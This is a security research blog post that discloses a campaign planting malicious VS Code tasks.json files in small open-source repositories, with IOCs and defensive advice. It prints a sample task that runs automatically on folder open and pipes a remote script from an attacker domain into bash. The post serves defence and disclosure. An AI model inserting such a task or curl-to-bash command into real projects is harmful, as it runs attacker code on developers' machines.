BLOG
Small Open-Source Maintainers Targeted by VS Code Tasks Malware
At least 21 small OSS maintainers hit in 72 hours via malicious VS Code task configurations
By c0a15726-c5b1-4b0d-85e6-fe15553df9e2 ·
The OpenSourceMalware team has identified an ongoing campaign targeting open-source maintainers through VS Code task configurations. Over the past 72 hours, we've observed 21 contributors had their repositories compromised with potentially malicious .vscode/tasks.json files that silently download and run bash and powershell scripts from a third-party domain.
The payloads are innocent…for now.
At this point the payloads from the third-party domain are innocuous, and appear to be placeholder throw away bash and powershell scripts. However, we’ve seen this before! The threat actor can change the payload at any point and suddenly any compromised user will get the new malicious payload. If the threat actors end up replacing the payloads with something like Beavertail, they could:they:
Steal browser credentials and cookies
Exfiltrate cryptocurrency wallet data
Harvest development credentials (Git, SSH keys, API tokens)
Establish persistence for follow-on access
The key takeaway: if you maintain an open-source project, you are a target, regardless of how small or obscure your project may seem.
TL;DR
Threat Actor: Unknown, but using DPRK TTPs
Attack Vector: Malicious
.vscode/tasks.jsonfiles planted in repositoriesScale: 21 maintainers/contributors compromised in 72 hours
Key Insight: Small project maintainers are being actively targeted
You're not too small to be a target
There's a dangerous misconception in the open-source community: "My project only has a few stars so why would nation-state actors care about me?"
This campaign proves that assumption wrong. Threat actors are systematically targeting maintainers of small, relatively unknown projects. The compromised repositories we've identified aren't major frameworks or widely-used libraries. Rather, they're personal projects, experimental tools, and niche utilities.
The attackers understand something important. Small projects often have:
Less security scrutiny
Maintainers who may be less security-aware
Potential to grow or be incorporated into larger projects
Access to the maintainer's development environment and credentials
21 repositories compromised so far
We identified multiple repositories that have been compromised in this campaign. The following represent just a sample of the 21 compromised maintainers we've identified. The common thread is not project popularity, it's opportunity.
Repository
Description
ryanmac/code-conductor
Code orchestration tool
anton-abyzov/specweave
Specification tooling
0xBloctopus/thorchain-package
THORChain utilities
dylanlittle/team-moshpit-project
Team project
Our team reached out to the compromised users. In one case, the victim validated that they didn't know anything about the tasks file and it was added without their knowledge. Their assumption is that a GitHub personal access token (PAT), was compromised.
In another conversation, the victim found that stolen SSH keys were used to authenticate to GitHub and upload the tasks file. So, we know the threat actor is working maliciously, we just don’t know what payload they are eventually going to hit us with.
It could be that some or all of these victims were originally compromised via the Shai-Hulud and S1ngularity attacks. Our team is working with other researchers to figure it out.
For open-source maintainers, the theft of development credentials is particularly concerning because it could enable supply chain attacks on any projects they contribute to.
How malicious VS Code tasks compromise you
The attack leverages VS Code's task runner feature. When a developer opens a project folder in VS Code, task configurations in .vscode/tasks.json can be set to run automatically.
The malicious tasks are configured to execute on folder open, downloading and running platform-specific payloads:
{
"version": "2.0.0",
"tasks": [
{
"label": "update-check",
"type": "shell",
"command": "curl -s https://vscode-extension-260120.vercel.app/settings/linux?flag=5- | bash",
"runOptions": {
"runOn": "folderOpen"
}
}
]
}The payload URLs are tailored by operating system:
Linux/macOS: Downloads shell script payload
Windows: Downloads Windows-specific payload
This is a particularly insidious attack because: It executes automatically when opening the folder Many developers trust their own repositories The .vscode folder is often overlooked in code reviews VS Code's task auto-run behavior is not widely known
How to protect yourself from a VS Code tasks attack vector
All open-source maintainers should:
Disable automatic task execution in VS Code: Set task.allowAutomaticTasks to off Review `.vscode` folders in any cloned or forked repositories Be suspicious of unsolicited PRs that modify VS Code configurations Check your repositories for unexpected .vscode/tasks.json files Use Git hooks to alert on changes to .vscode directories
To check your VS Code settings:
Preferences → Settings → Search "task.allowAutomaticTasks" → Set to "off"L
ook for the following IOCs:
C2 Infrastructure
https://vscode-extension-260120.vercel.app/settings/linux?flag=5-
https://vscode-extension-260120.vercel.app/settings/win?flag=5-
vscode-extension-260120.vercel.appMalicious File Pattern
.vscode/tasks.json (with runOn: folderOpen and curl/wget commands)How this is similar to North Korean “Contagious Interview” tactics
Separately, the OpenSourceMalware team has been tracking multiple DPRK campaigns that are part of the sprawling “Contagious Interview” set of campaigns targeting software engineers. In particular, the tasks.json files that are being added to these compromised GitHub repositories look EXACTLY like the malicious tasks files being added by DPRK threat actors. Look at the image below. On the left is a malicious payload from an active DPRK Lazarus Group threat. On the right, is one of the tasks.json files from this campaign. They look pretty similar, right?!
This campaign is a stark reminder that in the world of software supply chain attacks, there are no targets too small. DPRK threat actors are casting a wide net, targeting open-source maintainers regardless of project size or visibility.
If you maintain open-source software (even a side project with a handful of stars) take the time to secure your development environment and review your repositories for unexpected changes.